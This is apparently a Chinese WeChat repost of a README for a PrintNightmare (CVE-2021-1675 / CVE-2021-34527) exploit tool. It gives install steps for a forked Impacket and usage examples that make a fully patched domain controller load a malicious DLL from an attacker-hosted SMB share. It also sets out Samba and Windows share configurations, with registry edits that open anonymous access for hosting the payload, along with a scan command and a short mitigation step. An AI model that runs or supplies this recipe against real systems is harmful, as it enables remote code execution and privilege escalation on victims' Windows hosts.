点击上方蓝字“Ots安全”一起玩耍
CVE-2021-1675 / CVE-2021-34527 - PrintNightmare Python、C# 和 PowerShell 漏洞利用实现(LPE 和 RCE)
CVE-2021-1675 / CVE-2021-34527
最初由彭志娘 (@edwardzpeng) 和李雪峰 (@lxf02942370) 创建的PrintNightmare PoC 的Impacket 实现
在完全修补的 2019 域控制器上进行测试
远程或本地执行恶意DLL
补丁更新
微软已经发布了一个补丁来缓解这些攻击,但如果机器上存在以下这些值,那么该机器仍然容易受到攻击
REG QUERY "HKLMSoftwarePoliciesMicrosoftWindows NTPrintersPointAndPrint"HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindows NTPrintersPointAndPrintRestrictDriverInstallationToAdministrators REG_DWORD 0x0NoWarningNoElevationOnInstall REG_DWORD 0x1
安装
在运行漏洞利用之前,您需要安装我的 Impacket 版本,然后您就是 gucci
pip3 uninstall impacketgit clone https://github.com/cube0x0/impacketcd impacketpython3 ./setup.py install
CVE-2021-1675.py
usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target shareCVE-2021-1675 implementation.positional arguments:target [[domain/]username[:password]@]<targetName or address>share Path to DLL. Example '\10.10.10.10shareevil.dll'optional arguments:-h, --help show this help message and exitauthentication:-hashes LMHASH:NTHASHNTLM hashes, format is LMHASH:NTHASHconnection:-target-ip ip addressIP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS nameand you cannot resolve it-port [destination port]Destination port to connect to SMB ServerExample;./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\192.168.1.215smbaddCube.dll'./CVE-2021-1675.py hackit.local/domain_user:[email protected] 'C:addCube.dll'
中小企业配置
托管有效负载的最简单方法是使用 samba 并修改/etc/samba/smb.conf 以允许匿名访问
[global]map to guest = Bad Userserver role = standalone serverusershare allow guests = yesidmap config * : backend = tdbsmb ports = 445[smb]comment = Sambapath = /tmp/guest ok = yesread only = nobrowsable = yesforce user = smbuser
从窗户也可以
mkdir C:shareicacls C:share /T /grant Anonymous` logon:ricacls C:share /T /grant Everyone:rNew-SmbShare -Path C:share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'REG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipesREG ADD "HKLMSystemCurrentControlSetServicesLanManServerParameters" /v NullSessionShares /t REG_MULTI_SZ /d share /fREG ADD "HKLMSystemCurrentControlSetControlLsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /fREG ADD "HKLMSystemCurrentControlSetControlLsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f# Reboot
扫描
我们可以使用rpcdump.pyfrom impacket 来扫描潜在的易受攻击的主机,如果它返回一个值,它可能是易受攻击的
rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'Protocol: [MS-PAR]: Print System Asynchronous Remote ProtocolProtocol: [MS-RPRN]: Print System Remote Protocol
减轻
禁用后台处理程序服务
Stop-Service SpoolerREG ADD "HKLMSYSTEMCurrentControlSetServicesSpooler" /v "Start" /t REG_DWORD /d "4" /f
原文始发于微信公众号(Ots安全):【安全工具】CVE-2021-1675 / CVE-2021-34527 - PrintNightmare Python、C#
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论